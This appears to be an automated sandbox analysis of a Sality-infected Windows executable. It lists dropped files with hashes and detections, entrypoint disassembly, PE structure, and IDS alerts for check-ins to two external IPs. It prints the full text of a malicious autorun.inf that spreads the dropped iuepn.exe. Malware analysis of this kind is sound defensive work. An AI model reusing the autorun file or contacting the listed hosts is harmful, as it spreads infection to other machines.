                              SSDEEP:768:uWQ3655Kv1X/qY1MSdfsQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdfvGCq2iW7z
                              MD5:5DD0482C1A3CE1C8C24FB3AA66B96D19
                              SHA1:F3F7D95A7EF8E1B186D44D2619CDEEB21B269AC3
                              SHA-256:50854CA5A15B4F68E30E17D1FEB7471022E017B126239F69A60A7C1FD4200FE9
                              SHA-512:2BC8616EB5F9A475968659E3B80FD9C8FB5F2D40EFD89CE919BF60A7ECF0967BA2B0BA5742BA01516D0A1794D6C628E37888FB24E5DA1BB49E58078EB7C84EE2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):4
                              Entropy (8bit):1.5
                              Encrypted:false
                              SSDEEP:3:Nv:9
                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:foo.

                              C:\Users\user\AppData\Local\Temp\062D5100.exe

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):4
                              Entropy (8bit):1.5
                              Encrypted:false
                              SSDEEP:3:Nv:9
                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:foo.

                              C:\Users\user\AppData\Local\Temp\cgsc.exe

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):258
                              Entropy (8bit):7.284780829056715
                              Encrypted:false
                              SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                              MD5:88D20B23F81FA97A852263FC732277F8
                              SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                              SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                              SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                              Malicious:false
                              Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                              C:\Users\user\AppData\Local\Temp\rksowY.exe

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):15872
                              Entropy (8bit):7.031113762428177
                              Encrypted:false
                              SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                              MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                              SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                              SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                              SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 100%
                              Joe Sandbox View:
                              • Filename: log1.exe, Detection: malicious, Browse
                              • Filename: log2.exe, Detection: malicious, Browse
                              • Filename: 2.exe, Detection: malicious, Browse
                              • Filename: gracNYJFpD.exe, Detection: malicious, Browse
                              • Filename: xpKZwKFN9W.exe, Detection: malicious, Browse
                              • Filename: LVF7FM9Z4I.exe, Detection: malicious, Browse
                              • Filename: hJSrJRHret.exe, Detection: malicious, Browse
                              • Filename: KFt0cactum.exe, Detection: malicious, Browse
                              • Filename: gvQbT2QOfb.exe, Detection: malicious, Browse
                              • Filename: HN3iYIEz7m.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\winiomwfx.exe

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:data
                              Category:modified
                              Size (bytes):258
                              Entropy (8bit):7.284780829056715
                              Encrypted:false
                              SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                              MD5:88D20B23F81FA97A852263FC732277F8
                              SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                              SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                              SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                              Malicious:false
                              Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                              C:\Users\user\AppData\Local\Temp\winmefmb.exe

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):70656
                              Entropy (8bit):7.97694558158495
                              Encrypted:false
                              SSDEEP:1536:P0NKFeK+ew6OwZSO0Yj6y2CLGWixM0UF8P44v:P06eKy6XX6dKwQFF4v
                              MD5:088362DAABB86D586B5B6BBFBACC2626
                              SHA1:1D1505A3454FFFAE2308D5D36A58C50C8628C820
                              SHA-256:B73B0BA5269326E9E11B6D947147E589E39DAD397646E5D69B10FBDD0BB25A21
                              SHA-512:41617CC4013A61A5E1A4C5370D37C1AD5CA0398AC73F28A11333F5E7B7D38570E6E5DBA6CC8C479B02DB1FFEDAA416896B1D8FB6A4D92088BE019D0556ED2BDB
                              Malicious:true
                              Yara Hits:
                              • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................0..............................................`...<....................................................................................................................text.... ........................I. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............].....U.....@.j.....@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\winuoocay.exe

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):340
                              Entropy (8bit):7.428989227311812
                              Encrypted:false
                              SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                              MD5:2516CA1835F985ADEAB21CFBC34FF724
                              SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                              SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                              SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                              Malicious:false
                              Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                              C:\Users\user\Desktop\VF.dll

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):23040
                              Entropy (8bit):7.587194257344362
                              Encrypted:false
                              SSDEEP:384:CO90QQ/D91ZSH+chn7N6VDLvqEot7czwGQZbxEu47VP5bBSg5pxeKg:C1QM5Czz6VaEY7czwouehlfjQKg
                              MD5:4C9345B4819695C678D2CE9688D95FFB
                              SHA1:805FB11F46E71CD5AE00D489F3EB7385BD55DF63
                              SHA-256:6522C2A699B499B0E84E13D6D3A88D0C78A4EA59AF2B0FD3F0FBC22644A73751
                              SHA-512:6C115342CCFE01FE529AC8C4F448531FD6912B55E941C36A943C7BAE484230BEDA11EE5DEEEA816E263BF1D54E989B9CFC0D90AE24E2D77B887E6AF4DE36F82D
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 26%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!mw.!mw.!mw.Zq{. mw.qy.#mw.Nrs.#mw..r}.#mw..K}..mw..b*.(mw.!mv..mw..K|.?mw.!mw. mw..r|."mw..rs. mw.Rich!mw.........PE..L...Z.._...........!.....P...V......0...................................................................................`...................................4.......................................................................................UPX0....................................UPX1.....P.......P..................@...UPX2.................T..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\appcompat\Programs\Amcache.hve

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.465915215773589
                              Encrypted:false
                              SSDEEP:6144:5zZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:RZHtBZWOKnMM6bFpZj4
                              MD5:267F6B2978C6A77827851E0C037C5FAB
                              SHA1:6F372593BEF8AF26027C49AB6195FF0D64CCE63E
                              SHA-256:B1B30BD360830CD4861B8EC080CF0E143D14209EBF65D759A90D18D5DD5E8552
                              SHA-512:3BA36CA7F42DB12ECC6407A561F64762FF8EDE07011A1EBFC69F141500AD0B037715BF8B8BF75E08B6A6A0D47430FB24EC6F45A3060A0C8ABF751AE0E96FF6BB
                              Malicious:false
                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.%.................................................................................................................................................................................................................................................................................................................................................q..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\system.ini

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:Windows SYSTEM.INI
                              Category:dropped
                              Size (bytes):255
                              Entropy (8bit):5.255504738471726
                              Encrypted:false
                              SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPRQeR:F4Yv7yk3OUBq82wqFtPWW
                              MD5:1AEF09244F6A38EC6222A186332FF6A2
                              SHA1:91094ED5279233127C44756FC22C2DDBE6CE9270
                              SHA-256:DF79D44B019053257F4BD44CF08BA5095261135D4B997B0882FDAEEC08B0C9B4
                              SHA-512:CF0B497BC417F82F1671715364BD74031C7A5527B638C7AC6EC9CEA8E57BF66F8D5B5F4C54BDF8252675E6DA9435A11D9DE723282038DE260AE621CAC41EFDAB
                              Malicious:false
                              Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=45869063649..

                              C:\autorun.inf

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:Microsoft Windows Autorun file
                              Category:dropped
                              Size (bytes):252
                              Entropy (8bit):5.31479145452486
                              Encrypted:false
                              SSDEEP:6:0CUm1c5ZLJoSp5oroQ6WrTYTorRkUR48wLJoB1gwxOIV19ov:0CUmiJoa2row3corR/4nJoB+wNJov
                              MD5:E24E2126EA4D3223837AD40236EABF49
                              SHA1:B979A9BAB0132F550C0EB99C3D9FBF4A6BB4CF30
                              SHA-256:94BBA17485A0410DD12AFD1236F5203F769B8BB6B994F671167CA124644BAF10
                              SHA-512:31FAA2C94703D93240D66765E9352DBCCE71003E273399856B4CDB1972757545D6623715493316EF9D0204210C6930A6CE5D41E999F012FDCEFDABCFA1C53C79
                              Malicious:true
                              Preview:[AutoRun]....;pWCD kmpmtt..;cgmvuK jgrmbT..shelL\oPen\comMaND = iuepn.exe....;XNaRLsqGtqPj..open=iuepn.exe..shell\oPeN\DEfaUlT=1....;dtYoDftaw AxMphwqLevr pqTdobtSnUgE..shEll\Explore\COMMaNd = iuepn.exe..;gdxgetvidL..SHell\AUtoplay\commANd =iuepn.exe..

                              C:\iuepn.exe

                              Download File
                              Process:C:\Users\user\Desktop\1.0.0.2.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):103140
                              Entropy (8bit):7.980117026319258
                              Encrypted:false
                              SSDEEP:1536:P0NKFeK+ew6OwZSO0Yj6y2CLGWixM0UF8P44VO18jdt9Y7DXyAJE:P06eKy6XX6dKwQFF4guj/cDE
                              MD5:02EE8DD5E84DD2C1F5DC93A85A943DCB
                              SHA1:DE63DE2E0E72C6D8B762C121D430D903A43C2EDB
                              SHA-256:0B5DBFDCB1D2B2A9219DBB47881316ADCBD484471974577D7C7B73F7D5967CCA
                              SHA-512:FCB182C13D4C0F5955AC49740BFD5DFE72DB4FF7A4F384581ACFB1FE6AEF5998DF3E4780363591BC1DF4C74F1FC5025B7FBD41322BC5DE3EDAA0F8C5579BF428
                              Malicious:true
                              Yara Hits:
                              • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\iuepn.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................0..............................................`...<....................................................................................................................text.... ........................I. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............].....U.....@.j.....@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Entropy (8bit):7.851453430435399
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.24%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • UPX compressed Win32 Executable (30571/9) 0.30%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              File name:1.0.0.2.exe
                              File size:5'242'880 bytes
                              MD5:ad809738e208d99a28009023546bc695
                              SHA1:3326e4971b5b23122dac680dfb9eb41df0692267
                              SHA256:775939b8bf22ee4999cebd8d9e1525ca9417464b5fe6ed1778f0a7b43d07d6ef
                              SHA512:2c730917acab6344b187a2e208bd0753f78c4afd4804a209b3af034a1c8d90e50f7ebc3a00556bd79dac2fa385c2376622d88ad65f1ef4ee5e8fcce5af23a5cb
                              SSDEEP:98304:k2ONi+29K/WE9PhBGjohAInvqIKofZP5UyeAQQm4OTb12pcFS+fRXN/f0ykSJf+P:k4+SK9hh4M5v9fZP5UNDcOnMp0xN/8dn
                              TLSH:3936333681D5A2F6F4AA9D70633CF8D2D507312A3BE232711D06C9DA40B9EE2D4C9A57
                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......K..Y............`.......`.......t.......Y...#.......#...................m.......9...}...9...........c..........................

                              File Icon

                              Icon Hash:33e8f499f8ec6933

                              Static PE Info

                              General

                              Entrypoint:0xd63000
                              Entrypoint Section:pu
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:
                              Time Stamp:0x6000113C [Thu Jan 14 09:39:08 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:a6fac039708cc3b1dc87b477f4e93cc1

                              Entrypoint Preview

                              Instruction
                              sbb al, dh
                              push edx
                              push esi
                              jne 00007F60E4F78BECh
                              test al, 00000073h
                              adc ebx, 55DBBF92h
                              cmp ebp, 0000A53Dh
                              js 00007F60E4F78BECh
                              xchg cl, ch
                              sbb esi, 462B1CD7h
                              and eax, ebp
                              jmp 00007F60E4F78BE4h
                              add dh, dl
                              and edi, edi
                              dec edi
                              mov ecx, edx
                              imul esi, ecx, ED00E6CFh
                              dec ebp
                              mov cl, dl
                              test cl, 00000072h
                              test ebx, edi
                              jc 00007F60E4F78BECh
                              xchg ecx, ecx
                              lea ecx, dword ptr [0472A919h]
                              or ecx, eax
                              or cl, cl
                              lea ecx, dword ptr [509E0C08h]
                              mov ebp, ecx
                              inc ch
                              imul ecx, ebx, DD308976h
                              imul ecx, ecx, 478F617Dh
                              mov cl, ch
                              test al, FFFFFFEFh
                              push ebp
                              jne 00007F60E4F78BF0h
                              test al, ch
                              test esi, 238CA071h
                              imul ecx, edx, 9D350FF7h
                              pop esi
                              xchg cl, ch
                              test edx, 4D24425Ah
                              mov ecx, esi
                              mov ebp, FE018C06h
                              lea edi, dword ptr [esi]
                              imul ecx, ecx, 72B1634Dh
                              test bl, bl
                              movsx ebp, ch
                              mov ecx, esi
                              test ebx, ebp
                              lea edx, dword ptr [edi]
                              jnc 00007F60E4F78BE8h
                              mov ecx, ecx
                              imul esi, esi
                              mov ch, ch
                              mov eax, edx
                              movsx esi, cx
                              sub edx, 286F0A61h
                              lea ebx, dword ptr [eax]
                              lea ebp, dword ptr [4DE29DA2h]
                              jmp 00007F60E4F78BECh
                              mov ebx, 0392B612h
                              test bh, FFFFFF89h
                              xor edi, ebx
                              sbb edx, edx
                              inc edx
                              test edi, ecx

                              Rich Headers

                              Programming Language:
                              • [C++] VS98 (6.0) SP6 build 8804
                              • [ C ] VS98 (6.0) SP6 build 8804
                              • [C++] VS98 (6.0) build 8168
                              • [ C ] VS98 (6.0) build 8168
                              • [EXP] VC++ 6.0 SP5 build 8804

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x94dcd80x424.rsrc
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x94b0000x2cd8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              UPX00x10000x47a0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              UPX10x47b0000x4d00000x4cfc0072d5d09dd48c8b3129f439ece8b138fcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x94b0000x180000x180004f80a8fcfc7cfec1847b0c75b6152ab8False0.89459228515625data7.617344200663995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              pu0x9630000x180000x18000b9f7188d7e80a9084783d2046e29c238False0.924591064453125data7.7594391065047255IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              TEXTINCLUDE0x931fc40xbdataChineseChina1.7272727272727273
                              TEXTINCLUDE0x931fd00x16dataChineseChina1.4090909090909092
                              TEXTINCLUDE0x931fe80x151dataChineseChina1.032640949554896
                              WAVE0x93213c0x1448dataChineseChina0.9632126348228043
                              RT_CURSOR0x9335840x134dataChineseChina1.0357142857142858
                              RT_CURSOR0x9336b80x134dataChineseChina1.0357142857142858
                              RT_CURSOR0x9337ec0x134dataChineseChina1.0357142857142858
                              RT_CURSOR0x9339200xb4dataChineseChina1.0611111111111111
                              RT_CURSOR0x9339d40x134PGP Secret Sub-key -ChineseChina1.0357142857142858
                              RT_CURSOR0x933b080x134dataChineseChina1.0357142857142858
                              RT_BITMAP0x933c3c0x16cdataChineseChina1.0302197802197801
                              RT_BITMAP0x933da80x248dataChineseChina1.018835616438356
                              RT_BITMAP0x933ff00x144dataChineseChina1.0339506172839505
                              RT_BITMAP0x9341340x158dataChineseChina1.0319767441860466
                              RT_BITMAP0x93428c0x158dataChineseChina1.0319767441860466
                              RT_BITMAP0x9343e40x158dataChineseChina0.9040697674418605
                              RT_BITMAP0x93453c0x158dataChineseChina1.0174418604651163
                              RT_BITMAP0x9346940x158dataChineseChina1.0261627906976745
                              RT_BITMAP0x9347ec0x158dataChineseChina1.0319767441860466
                              RT_BITMAP0x9349440x158dataChineseChina1.0319767441860466
                              RT_BITMAP0x934a9c0x158dataChineseChina1.0319767441860466
                              RT_BITMAP0x934bf40x5e4dataChineseChina1.007294429708223
                              RT_BITMAP0x9351d80xb8dataChineseChina1.059782608695652
                              RT_BITMAP0x9352900x16cdataChineseChina1.0302197802197801
                              RT_BITMAP0x9353fc0x144dataChineseChina1.0339506172839505
                              RT_ICON0x9355400x2e8dataChineseChina1.0147849462365592
                              RT_ICON0x9358280x128dataChineseChina1.037162162162162
                              RT_ICON0x94bfc80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.848826714801444
                              RT_ICON0x94c8740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688ChineseChina0.36167377398720685
                              RT_ICON0x9370a00x8a8dataChineseChina1.0
                              RT_ICON0x9379480x568dataChineseChina1.0079479768786128
                              RT_ICON0x937eb00x21dedataChineseChina0.9823529411764705
                              RT_ICON0x93a0900x4228zlib compressed dataChineseChina0.9817548417572036
                              RT_ICON0x93e2b80x25a8dataChineseChina0.9810165975103734
                              RT_ICON0x9408600x1a68dataChineseChina0.9764792899408284
                              RT_ICON0x9422c80x10a8dataChineseChina0.9727954971857411
                              RT_ICON0x9433700x988dataChineseChina0.9655737704918033
                              RT_ICON0x943cf80x6b8dataChineseChina0.9808139534883721
                              RT_ICON0x9443b00x468dataChineseChina1.0097517730496455
                              RT_MENU0x9448180xcdataChineseChina1.6666666666666667
                              RT_MENU0x9448240x284dataChineseChina1.0170807453416149
                              RT_DIALOG0x944aa80x98OpenPGP Secret Key Version 6ChineseChina1.0723684210526316
                              RT_DIALOG0x944b400x17adataChineseChina1.029100529100529
                              RT_DIALOG0x944cbc0xfadataChineseChina1.044
                              RT_DIALOG0x944db80xeadataChineseChina1.047008547008547
                              RT_DIALOG0x944ea40x8aedataChineseChina1.0004500450045004
                              RT_DIALOG0x9457540xb2dataChineseChina1.050561797752809
                              RT_DIALOG0x9458080xccdataChineseChina1.053921568627451
                              RT_DIALOG0x9458d40xb2dataChineseChina1.0617977528089888
                              RT_DIALOG0x9459880xe2dataChineseChina1.0486725663716814
                              RT_DIALOG0x945a6c0x18cdataChineseChina1.0277777777777777
                              RT_STRING0x945bf80x50dataChineseChina1.1375
                              RT_STRING0x945c480x2cdataChineseChina1.25
                              RT_STRING0x945c740x78dataChineseChina1.0916666666666666
                              RT_STRING0x945cec0x1c4dataChineseChina1.0243362831858407
                              RT_STRING0x945eb00x12adataChineseChina1.0369127516778522
                              RT_STRING0x945fdc0x146dataChineseChina1.0337423312883436
                              RT_STRING0x9461240x40dataChineseChina1.171875
                              RT_STRING0x9461640x64dataChineseChina1.11
                              RT_STRING0x9461c80x1d8dataChineseChina1.0233050847457628
                              RT_STRING0x9463a00x114dataChineseChina1.039855072463768
                              RT_STRING0x9464b40x24dataChineseChina1.3055555555555556
                              RT_GROUP_CURSOR0x9464d80x14dataChineseChina1.45
                              RT_GROUP_CURSOR0x9464ec0x14dataChineseChina1.45
                              RT_GROUP_CURSOR0x9465000x14dataChineseChina1.45
                              RT_GROUP_CURSOR0x9465140x14dataChineseChina1.45
                              RT_GROUP_CURSOR0x9465280x22dataChineseChina1.3235294117647058
                              RT_GROUP_ICON0x94d7200x14data1.25
                              RT_GROUP_ICON0x9465600xbcdataChineseChina1.0585106382978724
                              RT_GROUP_ICON0x94661c0x14dataChineseChina1.45
                              RT_GROUP_ICON0x9466300x14dataChineseChina1.45
                              RT_VERSION0x94d7380x2e0dataChineseChina0.4904891304347826
                              RT_MANIFEST0x94da1c0x2b9XML 1.0 document, ASCII text, with very long lines (697), with no line terminators0.5279770444763271

                              Imports

                              DLLImport
                              ADVAPI32.dllRegCloseKey
                              COMCTL32.dll
                              comdlg32.dllChooseColorA
                              GDI32.dllLPtoDP
                              gdiplus.dllGdipDeletePen
                              imm32.dllImmGetContext
                              iphlpapi.dllGetAdaptersInfo
                              KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                              ole32.dllOleRun
                              OLEAUT32.dllRegisterTypeLib
                              RASAPI32.dllRasHangUpA
                              SHELL32.dllShellExecuteA
                              shlwapi.dllPathFileExistsA
                              USER32.dllGetDC
                              VERSION.dllVerQueryValueA
                              WININET.dllInternetOpenA
                              winmm.dllPlaySoundA
                              WINSPOOL.DRVClosePrinter
                              WS2_32.dllWSAGetLastError

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              ChineseChina

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              07/05/24-08:00:04.879865TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971580192.168.2.644.221.84.105
                              07/05/24-08:00:03.856779TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971280192.168.2.654.244.188.177
